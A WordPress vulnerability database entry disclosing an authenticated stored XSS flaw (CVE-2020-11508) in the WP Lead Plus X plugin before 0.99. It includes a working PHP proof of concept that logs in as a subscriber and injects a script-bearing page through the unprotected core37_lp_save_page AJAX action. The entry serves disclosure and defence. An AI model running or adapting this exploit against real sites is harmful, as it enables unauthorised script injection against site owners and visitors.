WordPress Plugin Vulnerabilities

WP Lead Plus X < 0.99 - Authenticated Stored Cross-Site Scripting (XSS)

Description

WP Lead Plus X is a WordPress plugin that allows site owners to create custom landing and "squeeze" pages, complete with its own page builder interface capable of inserting custom JavaScript. Unfortunately, this page builder interface also relied on an unprotected AJAX action core37_lp_save_page which lacked a capability check and a nonce check in order to save and update pages.

Proof of Concept

<?php
// Settings
$url = $argv[1]; //URL of the site
$wp_user = $argv[2]; //Subscriber Username
$wp_pass = $argv[3]; //Subcriber Password
$urlbits = parse_url($url);

$wp_url = $urlbits['scheme'].'://'.$urlbits['host'].'/';

// Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-login.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log'        => $wp_user,
    'pwd'        => $wp_pass,
    'wp-submit'  => 'Log+In',
    'testcookie' => '1'
)));
$output = curl_exec($ch);
curl_close($ch);

//Insert a page with stored XSS
$params=array(
'pageContent' => "%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-lp-172110%22%20style%3D%22width%3A%20700px%3B%22%20class%3D%22c37-lp%20c37-step%20ui-sortable%20ui-droppable%22%3E%0A%20%20%20%20%3Csection%20class%3D%22c37-section%20ui-sortable%20ui-droppable%22%20id%3D%22c37-section-643520%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-row%20d-flex%20flex-row%22%20id%3D%22c37-row-326243%22%3E%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%3Cdiv%20class%3D%22c37-col-md-12%20c37-col-sm-12%20c37-col-12%22%3E%0A%20%20%20%20%20%20%20%20%3Cdiv%20id%3D%22c37-box-865567%22%20class%3D%22c37-box%20flex-column%20d-flex%20flex-column%20ui-sortable%20ui-droppable%22%3E%0A%0A%20%20%20%20%20%20%20%20%0A%20%20%20%20%0A%3Cdiv%20data-original%3D%22false%22%20data-c37-type%3D%22code%22%20class%3D%22c37-lp-element%20c37-item-element%20ui-draggable-handle%22%20id%3D%22c37-code-108583%22%3E%0A%20%20%20%20%3Cdiv%20data-content%3D%22%22%20class%3D%22c37-code-container%22%3E%3Cscript%3Ealert('xss!')%3B%3C%2Fscript%3E%3C%2Fdiv%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%0A%3C%2Fdiv%3E%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%0A%20%20%20%20%3C%2Fdiv%3E%0A%0A%20%20%20%20%3C%2Fsection%3E%0A%3C%2Fdiv%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20",
'pageID' => isset($argv[4]) ? $argv[4] : '0',
'pageSlug'=>'poctest',
'pageTitle' => 'PoCTest',
'pageSettings' => '{"isVariant":false,"isPage":true,"variantPageID":0,"webFonts":[],"modelsJSON":{"c37-section-643520":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","layout":12,"containerClass":"","etype":"section","editingElementID":"c37-section-643520"},"c37-row-326243":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","layout":"12","etype":"row","editingElementID":"c37-row-326243"},"c37-box-865567":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","horizontal":"","vertical":"","size":{"desktop":12,"tablet":12,"phone":12},"direction":"flex-column","etype":"box","editingElementID":"c37-box-865567"},"c37-code-108583":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","code":"%3Cscript%3Ealert(\'xss!\')%3B%3C%2Fscript%3E","etype":"code","editingElementID":"c37-code-108583"},"page":{"action":{},"hidden":{"desktop":false,"tablet":false,"phone":false},"cssStyle":{"desktop":{"box-shadow":{},"background-color":{},"background-overlay":{}},"phone":{},"tablet":{},"customCSS":"","extraClasses":"","innerSelector":"","videoBg":{"type":"youtube","src":{"mp4":"","webm":"","ogv":"","yt":""}}},"trackingName":"","width":"700","codes":{"trackingCode":"","experimentCode":"","beforeBodyClosing":"","afterBodyOpening":"","metaCode":"","customCSSCode":""},"pageTitle":"PoC","pageSlug":"poc","weight":"1","cssID":"c37-lp-172110","editingElementID":"page","etype":"page"}},"flipCountdown":{},"simpleCountdown":{},"previewURL":"","imageSliders":{},"weight":1,"elementsActions":{},"jsCodes":{},"compiledCSS":""}',
'action' => 'core37_lp_save_page'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . 'wp-admin/admin-ajax.php');
curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded; charset=UTF-8', 'Connection: close'));
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
$output = curl_exec($ch);
echo $output;
curl_close($ch);

Affects Plugins

Plugin icon
free-sales-funnel-squeeze-pages-landing-page-builder-templates-make
Fixed in 0.99

References

CVE
CVE-2020-11508
URL
https://www.wordfence.com/blog/2020/04/critical-vulnerabilities-in-the-wp-lead-plus-x-wordpress-plugin/

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
Ramuel Gall (Wordfence)
Submitter
Ramuel Gall
Verified
No
WPVDB ID
dbbada0b-e7fc-4cb5-abd8-4a3a6545fe2f

Timeline

Publicly Published
2020-04-07 (about 4 years ago)
Added
2020-04-07 (about 4 years ago)
Last Updated
2021-01-19 (about 3 years ago)

Other

Published
Title
Published
2022-06-27
Title
Simple Post Notes < 1.7.6 - Admin+ Stored Cross-Site Scripting
Published
2023-11-15
Title
Bamboo Columns <= 1.6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
Published
2023-11-08
Title
Plainview Protect Passwords <= 1.4 - Reflected XSS
Published
2023-04-19
Title
File Gallery < 1.8.5.4 - Contributor+ Stored XSS
Published
2023-11-13
Title
AMP+ Plus <= 3.0 - Reflected Cross Site Scripting